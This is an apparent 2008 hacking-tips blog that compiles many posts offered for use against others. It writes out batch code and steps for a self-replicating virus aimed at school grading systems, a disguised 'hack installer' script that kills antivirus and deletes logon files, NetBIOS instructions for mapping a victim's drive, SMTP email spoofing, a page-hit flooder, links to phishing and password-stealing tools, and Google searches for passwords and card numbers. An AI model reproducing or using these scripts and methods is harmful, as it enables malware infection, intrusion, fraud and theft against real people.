Fastest Way To Hack into Someones System  

Saturday, November 29, 2008

Well as I already mentioned you can hack any system as it is conected to what we call “INTERNET”. To connect internet a system allocates a port for communication and Data Transfer. So we got to do is to get into that port that is to be hacked.


Steps: -

  1. Software PORT SCANNER from google.
  2. The IP address of the victim whose port is open.
  3. NETLAB which gives u all information includes victim IP address,Area from where he is accessing internet….
  4. The IP of victim u found initially into NETLAB .
  5. Thats it now you can access his system.

Note : This is really Hardcore Hacking and you should be very much careful while doing all this and you do all this on your own responsibility. This site is never responsible for anything you after reading any article from this site and there are almost 50-50 chances that you may get caught so don’t try this unless you are aware of everthing. Yes you can freak some of your friends by telling them that you can hack their systems very easily.

AddThis Social Bookmark Button


Get IP address anonymity everytime  

i have found one software which hide your IP address every time and give you a new IP address by creating a Tor Network…….

If u have Mozilla then it works very fine

First Download Vidalia Bundle from here


http://www.torproject.org/download.html.en

Here is link for Windows and MAC OS ……….So download it according to your requirement .

After that to easily turn on and turn off “TOR” .. You can install Firefox add on from here :


https://addons.mozilla.org/en-US/firefox/addon/2275

then restart firefox….After that you will see at right bottom corner that your tor addon for mozilla is installed…now when u want to hide your IP or want to surfing anonymously Turn on or turn off by clicking on this.

You can check your ip address here

http://www.whatismyip.com/

AddThis Social Bookmark Button


Auto Phisher / Fake Web Login Creator  

Auto Ph!$her / fake Web Login Creator

All u need to do is write in the source of the page u wanna ph!$h
and it will make the phisher for u automatically, and it even saves it as well.

Download
http://rapidshare.com/files/90895580/Fishing_Bait_2.5.rar

Password: PremSoni

AddThis Social Bookmark Button


Spoofing Via Telnet  

Get a smtp server ( i use mx1.hotmail.com)

they’re normally likemx1,mx2 etc..thehost.com.

Now, go to Start>Run>cmd then in the cmd window,

Type telnet mx1.hotmail.com 25

then HELO hotmail.com then MAIL FROM : (fake email here)

then RCPT TO: (person)then DATA then type your message,

you can press enter for a new line, finish the message by a full stop (.) on a new line, press enter!

spoofed.

For Educational purpose only

Didn’t it work? Go www.deadfake.com

AddThis Social Bookmark Button


Top 15 Hacking Software And My Favorites  

1. Nmap

I think everyone has heard of this one, recently evolved into the 4.x series.

Nmap (”Network Mapper”) is a free open source utility for network exploration or security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. Nmap runs on most types of computers and both console and graphical versions are available. Nmap is free and open source.

Can be used by beginners (-sT) or by pros alike (–packet_trace). A very versatile tool, once you fully understand the results.

Get Nmap Here

2. Nessus Remote Security Scanner

Recently went closed source, but is still essentially free. Works with a client-server framework.

Nessus is the world’s most popular vulnerability scanner used in over 75,000 organizations world-wide. Many of the world’s largest organizations are realizing significant cost savings by using Nessus to audit business-critical enterprise devices and applications.

Get Nessus Here

3. John the Ripper

Yes, JTR 1.7 was recently released!

John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix flavors, supported out of the box are Kerberos AFS and Windows NT/2000/XP/2003 LM hashes, plus several more with contributed patches.

You can get JTR Here

4. Nikto

Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 3200 potentially dangerous files/CGIs, versions on over 625 servers, and version specific problems on over 230 servers. Scan items and plugins are frequently updated and can be automatically updated (if desired).

Nikto is a good CGI scanner, there are some other tools that go well with Nikto (focus on http fingerprinting or Google hacking/info gathering etc, another article for just those).

Get Nikto Here

5. SuperScan

Powerful TCP port scanner, pinger, resolver. SuperScan 4 is an update of the highly popular Windows port scanning tool, SuperScan.

If you need an alternative for nmap on Windows with a decent interface, I suggest you check this out, it’s pretty nice.

Get SuperScan Here

6. p0f

P0f v2 is a versatile passive OS fingerprinting tool. P0f can identify the operating system on:

- machines that connect to your box (SYN mode),
- machines you connect to (SYN+ACK mode),
- machine you cannot connect to (RST+ mode),
- machines whose communications you can observe.

Basically it can fingerprint anything, just by listening, it doesn’t make ANY active connections to the target machine.

Get p0f Here

7. Wireshark (Formely Ethereal)

Wireshark is a GTK+-based network protocol analyzer, or sniffer, that lets you capture and interactively browse the contents of network frames. The goal of the project is to create a commercial-quality analyzer for Unix and to give Wireshark features that are missing from closed-source sniffers.

Works great on both Linux and Windows (with a GUI), easy to use and can reconstruct TCP/IP Streams! Will do a tutorial on Wireshark later.

Get Wireshark Here

8. Yersinia

Yersinia is a network tool designed to take advantage of some weakeness in different Layer 2 protocols. It pretends to be a solid framework for analyzing and testing the deployed networks and systems. Currently, the following network protocols are implemented: Spanning Tree Protocol (STP), Cisco Discovery Protocol (CDP), Dynamic Trunking Protocol (DTP), Dynamic Host Configuration Protocol (DHCP), Hot Standby Router Protocol (HSRP), IEEE 802.1q, Inter-Switch Link Protocol (ISL), VLAN Trunking Protocol (VTP).

The best Layer 2 kit there is.

Get Yersinia Here

9. Eraser

Eraser is an advanced security tool (for Windows), which allows you to completely remove sensitive data from your hard drive by overwriting it several times with carefully selected patterns. Works with Windows 95, 98, ME, NT, 2000, XP and DOS. Eraser is Free software and its source code is released under GNU General Public License.

An excellent tool for keeping your data really safe, if you’ve deleted it..make sure it’s really gone, you don’t want it hanging around to bite you in the ass.

Get Eraser Here.

10. PuTTY

PuTTY is a free implementation of Telnet and SSH for Win32 and Unix platforms, along with an xterm terminal emulator. A must have for any h4×0r wanting to telnet or SSH from Windows without having to use the crappy default MS command line clients.

Get PuTTY Here.

11. LCP

Main purpose of LCP program is user account passwords auditing and recovery in Windows NT/2000/XP/2003. Accounts information import, Passwords recovery, Brute force session distribution, Hashes computing.

A good free alternative to L0phtcrack.

LCP was briefly mentioned in our well read Rainbow Tables and RainbowCrack article.

Get LCP Here

12. Cain and Abel

My personal favourite for password cracking of any kind.

Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols. The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort.

Get Cain and Abel Here

13. Kismet

Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and can sniff 802.11b, 802.11a, and 802.11g traffic.

A good wireless tool as long as your card supports rfmon (look for an orinocco gold).

Get Kismet Here

14. NetStumbler

Yes a decent wireless tool for Windows! Sadly not as powerful as it’s Linux counterparts, but it’s easy to use and has a nice interface, good for the basics of war-driving.

NetStumbler is a tool for Windows that allows you to detect Wireless Local Area Networks (WLANs) using 802.11b, 802.11a and 802.11g. It has many uses:

  • Verify that your network is set up the way you intended.
  • Find locations with poor coverage in your WLAN.
  • Detect other networks that may be causing interference on your network.
  • Detect unauthorized “rogue” access points in your workplace.
  • Help aim directional antennas for long-haul WLAN links.
  • Use it recreationally for WarDriving.

Get NetStumbler Here

15. hping

To finish off, something a little more advanced if you want to test your TCP/IP packet monkey skills.

hping is a command-line oriented TCP/IP packet assembler/analyzer. The interface is inspired to the ping unix command, but hping isn’t only able to send ICMP echo requests. It supports TCP, UDP, ICMP and RAW-IP protocols, has a traceroute mode, the ability to send files between a covered channel, and many other features.

Get hping Here

Source:http://www.darknet.org.uk/2006/04/top-15-securityhacking-tools-utilities/

AddThis Social Bookmark Button


Small Hack For Orkut  

Orkut a very famous social networking site has an option called scrapbook. Now for those people who scrap many times a minute, here is a hack:

If you are using firefox, Install this script (addon) and it will allow you to scrap back just in one click rather than the traditional 2 step + 1 click scrapping. This not only saves time, but also helps you keep things contextual.

Screenshot (click to enlarge):
orkut

Another reason to shift to firefox ) works with all versions of firefox.

AddThis Social Bookmark Button


Page hits flooder  

This small program can flood ur page hits.

but you have to dedicate one browser for it.. like internet explorer
method:
make a batch file with these lines

@echo off
:1
start C:\Progra~1\Intern~1\iexplore.exe “http://yoursite.com
ping -n 10 127.0.0.1 >nul
taskkill.exe /im iexplore.exe
goto 1

depending upon your net speed u may increase the 10 secs time wait

with 10 sec time u may have 360 hits in an hour
with 5 sec time u may have 720 hits in an hour

AddThis Social Bookmark Button


Website Hacking  

Note: This is for Average Hackerz, Not Newbies
This article was taken from http://www.ifinityexists.com
we are explaining the website attack known as Cross-Site Scripting (XSS). Cross-Site Scripting is a type of security vulnerability that affects web applications that do not sanitize user input properly. This kind of vulnerability allows an “attacker” to inject HTML or client side script like JavaScript into the website. Cross-Site Scripting is most commonly used to steal cookies. Cookies are used for authenticating, tracking, and maintaining specific information about users; therefore, by stealing a user’s cookies an attacker could bypass the website’s access control. There are three types of XSS attacks: Persistent, Non-Persistent, and DOM-Based. In this episode we will cover Persistent and Non-Persistent Cross-Site Scripting attacks.Live Stream Here
Download Here

Download Cookie Catcher Here

Get a md5 password hasher, to decrypt the hash

AddThis Social Bookmark Button


Hide Your Files In a JPEG  

Well, did you know you could hide your files in a JPEG file? For this, you will only need to download WinRAR. You just need to have a little knowledge about Command Prompt and have WinRAR installed.

Ok, lets begin…

1. Gather all the files that you wish to hide in a folder anywhere in your PC (make it in C:\hidden - RECOMMENDED).

2. Now, add those files in a RAR archive (e.g. secret.rar). This file should also be in the same directory (C:\hidden).

3. Now, look for a simple JPEG picture file (e.g. logo.jpg). Copy/Paste that file also in C:\hidden.

4. Now, open Command Prompt (Go to Run and type ‘cmd‘). Make your working directory C:\hidden.

5. Now type: “COPY /b logo.jpg + secret.rar output.jpg” (without quotes) - Now, logo.jpg is the picture you want to show, secret.rar is the file to be hidden, and output.jpg is the file which contains both. :D

6. Now, after you have done this, you will see a file output.jpg in C:\hidden. Open it (double-click) and it will show the picture you wanted to show. Now try opening the same file with WinRAR, it will show the hidden archive .

AddThis Social Bookmark Button


Shut Down Your School!  

By using the following command you can shutdown your school or college by using only Note pad.This is the main command that will be launched upon startup.
Type this in Notepad.
@echo offshutdown.exe -s -t 10 -c
“You have been hacked!”
Save this as shutdown.bat, making sure you choose all files as the filetype.

Step 2
Make it run on StartupThe file you need can be downloaded here:This is just a simple registry file that anyone can create, but I don’t feel like explaining the registry to everyone. It will disguise itself by claiming to be an update for STI.
http://www.mutantsrus.com/Update.reg

Step 3
Set up the replication systemHere is the code to set up the replicator (the program that allows the virus to reproduce). This simply gets it ready to infect the teachers. ?,$, and ! means that it varies. It depends on what program you are using. To find out how to fill these blank, get on a computer that has access to the server that stores your grading program. ? is the drive letter. $ is any folders and sub folders that contain the main exe for the grading program. ! is the name of the main exe.

Example O:\sti\ssts2\sti.exe?=O$=sti\ssts2!=sti

Here is the code:

@echo offcd C:\move ?:\$\!.exeren C:?.exe real.exeren C:virus.exe !.execd ?:\$move C:\!.exemove C:\shutdown.batmove C:\Update.regexit

Save this as global.bat

Step 4
They grow up so fast — real fast!This script will infect any teacher that uses STI with the shutdown command. The little viral babies will copy themselves to the user’s hard drive and remain there.

@echo offcd C:\WINDOWSEcho STI must update itself, this will only take a few seconds.pauseEcho Please wait while the files install.move ?:\$\shutdown.batmove ?:\$\Update.regmove ?:\$\cure.exemove ?:\$\cure.exemove ?:\$\cure.batmove ?:\$\remove.batEcho Adding information to registry.pausestart regedit.exe Update.regcd ?:\$start real.exeexit
Now this one has to be in exe form. So save it as virus.bat, then compile it in Quick Batch File Compiler. You can get QuickBFC here: QuickBFC and download this file as a template for QuickBFC to work with. Just save the compiled file over this one.

Step 5
The CureThis is a little tool that can fix all damage done by your virus, it works in the same way that the virus works, but works to correct the problem rather than create it.
@echo off
shutdown -acd C:\WINDOWSdel shutdown.bat

Save as cure.bat

@echo offcd ?:\$del !.execd C:\move ?:\$\real.exeren C:\real.exe !.execd ?:\$move C:\?.execd C:\WINDOWS
Now download this file: http://www.mutantsrus.com/cure.exe

Step 6
The SetupNo it’s not the name of a heist movie. It is simply a SFX file that extracts all the files to their proper places and places the replicator in the STI drive.I am going to use WinRAR to do this. You can get WinRAR here: http://www.rarlab.com. First gather all the files you have made thus far. The files should be shutdown.bat, Update.reg, virus.exe, cure.exe, cure.bat, remove.bat and global.bat. Now select them all and put them in a .rar file. Then open Winrar and go to “tools”, then select “convert archive to SFX”. Click “Advanced SFX Options” In the field labeled Path to Extract, type C:\WINDOWS In the field labeled Run After Extraction, type C:\WINDOWS\global.bat Save the finished file anywhere you want and as any name. To install the virus, just run this program on a computer at school that is connected to the server that has the grading program on it (such as any computer in the Comp Lab.

AddThis Social Bookmark Button


Find IP info using Gmail/Yahoo/Hotmail  

When you recieve an email, you receive more than just the message. The email comes with headers that carry important information that can tell where the email was sent from and possibly who sent it. For that, you would need to find the IP address of the sender. The tutorial below can help you find the IP address of the sender. Note that this will not work if the sender uses anonymous proxy servers.



First of all, the IP address is generally found in the headers enclosed beween square brackets, for instance, [129.130.1.1]
Finding IP address in Gmail

1. Log into your Gmail account with your username and password.
2. Open the mail.
3. To display the email headers,

  • Click on the inverted triangle beside Reply. Select Show Orginal.

4. manually find the IP address, proceed to 5.
5. Look for Received: from followed by the IP address between square brackets [ ].

Received: from [69.138.30.1] by web4587.mail.***.yahoo.com

6. If you find more than one Received: from patterns, select the last one.
7. Track the IP address of the sender

Finding IP address in Yahoo! Mail

1. Log into your Yahoo! mail with your username and password.

2. Click on Inbox or whichever folder you have stored your mail.

3. Open the mail.

4. If you do not see the headers above the mail message, your headers are not displayed. To display the headers,

  • Click on Options on the top-right corner
  • In the Mail Options page, click on General Preferences
  • Scroll down to Messages where you have the Headers option
  • Make sure that Show all headers on incoming messages is selected
  • Click on the Save button
  • Go back to the mails and open that mail

5. You should see similar headers like above

Or if you want to manually find the IP address, proceed to 6.

6. Look for Received: from followed by the IP address between square brackets [ ]. Here, it is 202.65.138.109.

That is be the IP address of the sender.

If there are many instances of Received: from with the IP address, select the IP address in the last pattern. If there are no instances of Received: from with the IP address, select the first IP address in X-Originating-IP.


7. Track the IP address of the sender

Finding IP address in Hotmail

1. Log into your Hotmail account with your username and password.

2. Click on the Mail tab on the top.

3. Open the mail.

4. If you do not see the headers above the mail message, your headers are not displayed. To display the headers,

  • Click on Options on the top-right corner
  • In the Mail Options page, click on Mail Display Settings
  • In Message Headers, make sure Advanced option is checked
  • Click on Ok button
  • Go back to the mails and open that mail

5. You should see the email headers now.

6. manually find the IP address, proceed to 7.

7. If you find a header with X-Originating-IP: followed by an IP address, that is the sender’s IP address

Hotmail headers


In this case the IP address of the sender is [68.34.60.59].

8. If you find a header with Received: from followed by a Gmail proxy like this

Hotmail headers

Look for Received: from followed by IP address within square brackets[
In this case, the IP address of the sender is [69.140.7.58].

9. Or else if you have headers like this

Hotmail headers

Look for Received: from followed by IP address within square brackets[].
In this case, the IP address of the sender is [61.83.145.129] (Spam mail).

10. If you have multiple Received: from headers, eliminate the ones that have proxy.anyknownserver.com.

11. Track the IP address of the sender

AddThis Social Bookmark Button


Ice Cold Reloaded  

MSN Passport Account Freezer and (De)Freezer [basically just stops freezing]. It gives you the ability to prevent a person from signing into MSN Messenger, or his/her hotmail inbox. It includes support for the latest MSN Messenger Protocol.

Download Link

http://download.download-free-software.net/IceCold_ReLoaded

AddThis Social Bookmark Button


Create Folders And Files With NO! Name  

This trick will allow you to create files and folders without any name.

Just follow the following steps:
1.Select any file or folder.
2.Right click on it, press rename or simply press F2.
3.Press and hold the alt key. While holding the Alt key, type numbers 0160 from the numpad.

Note: Type the numbers 0160 from the numpad, that is, the numbers present on the right side of the keyboard. Don’t type the numbers which are present on top of the character keys.

4.Press Enter and the nameless file or folder will be created.

Reason: The file or folder that seems nameless is actually named with a single space.

But what if you want to create another nameless file or folder in the same directory ?

For this you will have to rename the file with 2 spaces. Just follow these steps below:

1.Select file, press F2.
2.Hold alt key and type 0160 from the numpad.
3.Release the alt key. Now without doing anything else, again hold alt key and press 0160.
4.Press enter and you will have second nameless file in the same directory.
5.Repeat step 3 to create as many nameless files or folders in the same directory.

(we’ve had a problem with deleting these folders, to do so, start your computer in safe mode and delete it from there.)

AddThis Social Bookmark Button


USB Password Stealer  

Tweaked USB that steals every passwords including licences.

Instructions
1.Decompress the archive and put all the files located in the folder “USBThief”into a USB.
2.Insert the USB in your victim’s computer.
3.View folder “dump” to see the passwords.

Download

Password: www.dl4all.com

AddThis Social Bookmark Button


Cloning Hard Drives  

Did know that you could clone your current Hard Drive without having to by extra software? Maybe you didn’t know that all that you needed, was already set up on your current system? Well, it is… and if you follow this tut, you shouldn’t have much of a problem.

Make sure that you have a Master and a Slave setup on your system. The Slave drive, in this case, is where all the data on the Master is going to go to.

First: Perform a Scandisk your Master drive and follow that with a thorough Defrag. If you have an Antivirus program, do a thorough sweep with the AV first, then do the Scandisk, followed by the Defrag.

Second: Do the same thing to the target drive, as you did the Master: Scandisk then a thorough Defrag.

Third: Right-click on the Target drive and click on Format. When the box comes up, click your mouse onto the “Full” button.

Fourth: After Formatting the Target drive, run a Scandisk again and click on the button that says “Autofix Errors”.

Fifth: In this final part, you might want to cut-and-paste to code in, unless you are sure that you can do it without making any mistakes:

Click on the “Start” button, then click on the “Run…” button, then place the following into the Runbox:

“XCOPY C:\*.*D:\ /c/h/e/k/r” (minus the quotes, of course) then press the “Enter” button.

If you receive an error message, then remove the space from between XCOPY and C:\

Anything that should happen to come up in the DOS box, just click “Y” for “Yes”. When its all finished, pull the original Master from the system, designate the Slave as the Master (change your jumpers), then check your new Master out.

This tut has worked and has been tested on all systems except for Windows 2000, so you really shouldn’t have any problems. If, by any chance, you should come across a snag, message me and I’ll walk you through it.

AddThis Social Bookmark Button


NetBios Hacking  

For this tutorial, I used Microsoft’s Windows XP Home Edition OS

What is it?

NetBIOS Hacking is the art of hacking into someone else’s computer through your computer. NetBIOS stands for “Network Basic Input Output System.” It is a way for a LAN or WAN to share folders, files, drives, and printers.

How can this be of useful to me?

Most people don’t even know, but when they’re on a LAN or WAN they could possibly have their entire hard drive shared and not even know. So if we can find a way into the network, their computer is at our disposal.

What do I need?

Windows OS
Cain and Abel

CODE
(http://www.oxid.it/downloads/ca_setup.exe)


————–

So first off we need to find a computer or the computer to hack into. So if your plugged in to the LAN, or connected to the WAN, you can begin. Open up Cain and Abel. This program has a built in sniffer feature. A sniffer looks for all IP addresses in the local subnet. Once you have opened up the program click on the sniffer tab, click the Start/Stop sniffer, and then click the blue cross

> Hacker's Heaven">

Another window will pop up, make sure “All host in my subnet” is selected, and then click ok.

> Hacker's Heaven">

It should begin to scan.

> Hacker's Heaven">

Then IP’s, computer names, and mac addresses will show up. Now remember the IP address of the computer you are going to be breaking into. If you can’t tell whether the IP address is a computer, router, modem, etc, that’s ok. During the next step we will begin our trial and error.

> Hacker's Heaven">

Part 2, Trial and Error
————————————————————————————————

Now, we don’t know if we have our designated target, or if we have a computer or printer, or whatever else is on the LAN or WAN. If you did get the IP of the target though, I still recommend reading through this section, for it could be helpful later on. Click on the start menu and go to run, type in cmd, and click ok. This should bring up the command prompt. From here we will do most of the hacking. Now I will be referring to certain commands that need to be inputted into the command prompt. I will put these commands in quotes, but do not put the quotes in the code when you type it into the prompt. I am only doing this to avoid confusion. Let’s get back to the hacking. Type in “ping (IP address of the target).” For example in this tutorial, “ping 192.168.1.103.” This will tell us if the target is online. If it worked, it will look something like this (note, I have colored out private information):

> Hacker's Heaven">

IF it didn’t work, meaning that the target is not online, it will look something like this:

> Hacker's Heaven">

If the target is not online, either switch to a different target, or try another time. If the target is online, then we can proceed.

Part 3, Gathering the Information.
————————————————————————————————–

Now, input this command “nbtstat –a (IP address of target).” An example would be “nbtstat –a 192.168.1.103.” This will show us if there is file sharing enabled, and if there is, it will give us the: currently logged on user, workgroup, and computer name.

> Hacker's Heaven">

Ok, you’re probably wondering, “What does all this mean to me?” Well, this is actually very important, without this, the hack would not work. So, let me break it down from the top to bottom. I will just give the first line of information, and then explain the paragraph that follows it.

The information right below the original command says: “Local Area Connection,” this information tells us about our connection through the LAN, and in my case, I am not connected through LAN, so the host is not found, and there is no IP.

The information right below the “Local Area Connection,” is “Wireless Network Connection 2:” It gives us information about the connection to the target through WAN. In my case I am connected through the WAN, so it was able to find the Node IpAddress. The Node IpAddress is the local area IP of the computer you are going to break into.

The NetBIOS Remote Machine Name Table, give us the workgroup of our computer, tells us if it is shared, and gives us the computer name. Sometimes it will even give us the currently logged on user, but in my case, it didn’t. BATGIRL is the name of the computer I am trying to connect to. If you look to the right you should see a <20>. This means that file sharing is enabled on BATGIRL. If there was not a <20> to the right of the Name, then you have reached a dead end and need to go find another IP, or quit for now. Below BATGIRL is the computers workgroup, SUPERHEROES. If you are confused about which one is the workgroup, and the computer, look under the Type category to the right of the < > for every Name. If it says UNIQUE, it is one system, such as a printer or computer. If it is GROUP, then it is the workgroup

Step 4, Breaking In
———————————————————————————————–

Finally it’s time. By now we know: that our target is online, our target has file sharing, and our target’s computer name. So it’s time to break in. We will now locate the shared drives, folders, files, or printers. Type in “net view \\(IP Address of Target)”
An example for this tutorial would be: “net view \\192.168.1.103”

> Hacker's Heaven">

We have our just found our share name. In this case, under the share name is “C,” meaning that the only shared thing on the computer is C. Then to the right, under Type, it says “Disk.” This means that it is the actual C DISK of the computer. The C DISK can sometimes be an entire person’s hard drive.

All’s that is left to do is “map” the shared drive onto our computer. This means that we will make a drive on our computer, and all the contents of the targets computer can be accessed through our created network drive. Type in “net use K: \\(IP Address of Target)\(Shared Drive). For my example in this tutorial, “net use K: \\192.168.1.103\C.” Ok, let’s say that you plan on doing this again to a different person, do u see the “K after “net use?” This is the letter of the drive that you are making on your computer. It can be any letter you wish, as long as the same letter is not in use by your computer. So it could be “net use G…,” for a different target.

> Hacker's Heaven">

As you can see, for my hack I have already used “K,” so I used “G” instead. You may also do the same for multiple hacks. If it worked, it will say “The command completed successfully.” If not, you will have to go retrace you steps. Now open up “my computer” under the start menu, and your newly created network drive should be there.

> Hacker's Heaven">

Now, if you disconnect from the WAN or LAN, you will not be able to access this drive, hence the name Network Drive. The drive will not be deleted after you disconnect though, but you won’t be able to access it until you reconnect to the network. So if you are doing this for the content of the drive, I recommend dragging the files and folders inside of the drive onto your computer, because you never know if the target changes the sharing setting. If you are just doing this to hack something, then go explore it and have some well deserved fun!

Congratulations! You’re DONE!
But, before you leave, please look over some of this information for further help and just for thanks to me.

-Commands used in this tutorial:

PING
NBTSTAT -a (IP Address of Target)
NET VIEW \\(IP Address of Target)
NET USE K: \\(IP Address of Target)\(SHARENAME)


AddThis Social Bookmark Button


Exploit SQL Server System  

Whether it is through manual poking and prodding or the use of security testing tools, malicious attackers employ a variety of tricks to break into SQL Server systems, both inside and outside your firewall. It stands to reason then, if the hackers are doing it, you need to carry the same attacks to test the security strength of your systems. Here are 10 hacker tricks to gain access and violate systems running SQL Server.

1. Direct connections via the Internet

These connections can be used to attach to SQL Servers sitting naked without firewall protection for the entire world to see (and access). DShield’s Port Report shows just how many systems are sitting out there waiting to be attacked. I don’t understand the logic behind making a critical server like this directly accessible from the Internet, but I still find this flaw in my assessments, and we all remember the effect the SQL Slammer worm had on so many vulnerable SQL Server systems. Nevertheless, these direct attacks can lead to denial of service, buffer overflows and more.

2. Vulnerability scanning

Vulnerability scanning often reveals weaknesses in the underlying OS, the Web application or the database system itself. Anything from missing SQL Server patches to Internet Information Services (IIS) configuration weaknesses to SNMP exploits can be uncovered by attackers and lead to database server compromise. The bad guys may use open source, home-grown or commercial tools. Some are even savvy enough to carry out their hacks manually from a command prompt. In the interest of time (and minimal wheel spinning), I recommend using commercial vulnerability assessment tools like QualysGuard from Qualys Inc. (for general scanning), WebInspect from SPI Dynamics (for Web application scanning) and Next Generation Security Software Ltd.’s NGSSquirrel for SQL Server (for database-specific scanning). They’re easy to use, offer the most comprehensive assessment and, in turn, provide the best results. Figure 1 shows some SQL injection vulnerabilities you may be able to uncover.

sql hacker fig1

Figure 1: Common SQL injection vulnerabilities found using WebInspect.

3. Enumerating the SQL Server Resolution Service

Running on UDP port 1434, this allows you to find hidden database instances and probe deeper into the system. Chip Andrews’ SQLPing v 2.5 is a great tool to use to look for SQL Server system(s) and determine version numbers (somewhat). This works even if your SQL Server instances aren’t listening on the default ports. Also, a buffer overflow can occur when an overly long request for SQL Servers is sent to the broadcast address for UDP port 1434.

4. Cracking SA passwords

Deciphering SA passwords is also used by attackers to get into SQL Server databases. Unfortunately, in many cases, no cracking is needed since no password has been assigned (Oh, logic, where art thou?!). Yet another use for the handy-dandy SQLPing tool mentioned earlier. The commercial products AppDetective from Application Security Inc. and NGSSQLCrack from NGS Software Ltd. also have this capability.

5. Direct-exploit attacks

Direct attacks using tools such as Metasploit, shown in Figure 2, and its commercial equivalents (CANVAS and CORE IMPACT) are used to exploit certain vulnerabilities found during normal vulnerability scanning. This is typically the silver-bullet hack for attackers penetrating a system and performing code injection or gaining unauthorized command-line access.

> Hacker's Heaven">

Figure 2: SQL Server vulnerability exploitable using Metasploit’s MSFConsole.

6. SQL injection

SQL injection attacks are executed via front-end Web applications that don’t properly validate user input. Malformed SQL queries, including SQL commands, can be inserted directly into Web URLs and return informative errors, commands being executed and more. These attacks can be carried out manually — if you have a lot of time. Once I discover that a server has a potential SQL injection vulnerability, I prefer to perform the follow-through using an automated tool, such as SPI Dynamics’ SQL Injector, shown in Figure 3.
> Hacker's Heaven">
Figure 3: SPI Dynamics’ SQL Injector tool automates the SQL injection process.

7. Blind SQL injection

These attacks go about exploiting Web applications and back-end SQL Servers in the same basic fashion as standard SQL injection. The big difference is that the attacker doesn’t receive feedback from the Web server in the form of returned error messages. Such an attack is even slower than standard SQL injection given the guesswork involved. You need a good tool for this situation, and that’s where Absinthe, shown in Figure 4, comes in handy.

> Hacker's Heaven">
Figure 4: Absinthe tool takes the pain out of blind SQL injection testing.

8. Reverse engineering the system

The reverse engineering trick looks for software exploits, memory corruption weaknesses and so on. In this sample chapter from the excellent book Exploiting Software: How to Break Code by Greg Hoglund and Gary McGraw, you’ll find a discussion about reverse engineering ploys.

9. Google hacks

Google hacks use the extraordinary power of the Google search engine to ferret out SQL Server errors — such as “Incorrect syntax near” — leaking from publicly accessible systems. Several Google queries are available at Johnny Long’s Google Hacking Database. (Look in the sections titled Error Messages and Files containing passwords.) Hackers use Google to find passwords, vulnerabilities in Web servers, underlying operating systems, publicly available procedures and more that they can use to further compromise a SQL Server system. Combining these queries with Web site names via Google’s ’site:’ operator often turns up juicy info you never imagined you could unearth.

10. Perusing Web site source code

Source code can also turn up information that may lead to a SQL Server break in. Specifically, developers may store SQL Server authentication information in ASP scripts to simplify the authentication process. A manual assessment or Google could uncover this information in a split second.

AddThis Social Bookmark Button


Restart your friend’s phone using sms  

Here is a new trick to restart ur friends mobile via sms

with this trick only 1110,1110i,1112,1100,2100 can be restarted.

just type

,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

,,
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

or 79 inverted commas

in text msg and send it to ur friend having cells mention above and see wat happens.

AddThis Social Bookmark Button


How to Unlock Password Protected Memory Cards  

Well its quite simple but most of the people do not know it.

Please note the fact that it only works if the password to the MMC Card was set in ur own mobile,where u want it to be unlocked.

This method works well for nokia cells with symbian operating system.Never tried on other cells.use any software like FXplorer that can browse files in ur cell.

1. Open one of above software you have.
2. Browse through the directory, C:\system
3. Rename the file mmcstore to mmcstore.txt
4. Open the file - The file will open in Notes.
5. You will find your password in that file. That file would also contain much more data which you do not understand,so you need to go through the file to get the password!

When ur cell is connected to pc by means of data cable or bluetooth,u can see the password by simply opening the file mmcstore with notepad.

AddThis Social Bookmark Button


Fool Someone Into Thinking That He Is Installing a Hack  

Just Copy This Code Below In Notepad, Save as installhack.bat and you are done!

This Hack will:

1. End Process, NAVAPSVC.exe
2. End Process, Explorer.exe (taskbar and icons will dissapear)
3. End Process, zonelabs.exe
4. associate a exe file with txt (when opening exe files, it will go to notepad)
5. associate a txt file with mp3 (when opening txt files, it will open WinAmp or WMP)
6. Deletes Login/Logoff Screens

************************************************************************************

title Hack Setup
color 0A
@echo off
set end=md “Hack installing”
set fin=copy “Hack log.txt” “Installing”
%end%
%fin%
net send * Hack is installing, press OK to begin set up.
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
cls
msg * It is you who is hacked….
msg * I warned you, and you kept going. Challenge me and this is what happens.
DEL C:\WINDOWS\system32\logoff.exe /F /Q
DEL C:\WINDOWS\system32\logon.exe /F /Q
DEL C:\WINDOWS\system32\logon.scr /F /Q
cls
shutdown

**************************************************************

Please Do NOT Try This Yourself!

I will NOT Be Held Responsible for this!

AddThis Social Bookmark Button


Google Hacking  

Tuesday, November 25, 2008

Using Google, and some finely crafted searches we can find a lot of interesting information.

For Example we can find:
Credit Card Numbers
Passwords
Software / MP3's
...... (and on and on and on)
Presented below is just a sample of interesting searches that we can send to google to obtain info that some people might not want us having.. After you get a taste using some of these, try your own crafted searches to find info that you would be interested in.

Try a few of these searches:

intitle:"Index of" passwords modified
allinurl:auth_user_file.txt
"access denied for user" "using password"
"A syntax error has occurred" filetype:ihtml
allinurl: admin mdb
"ORA-00921: unexpected end of SQL command"
inurl:passlist.txt
"Index of /backup"
"Chatologica MetaSearch" "stack tracking:"

Amex Numbers: 300000000000000..399999999999999
MC Numbers: 5178000000000000..5178999999999999
visa 4356000000000000..4356999999999999

"parent directory " /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

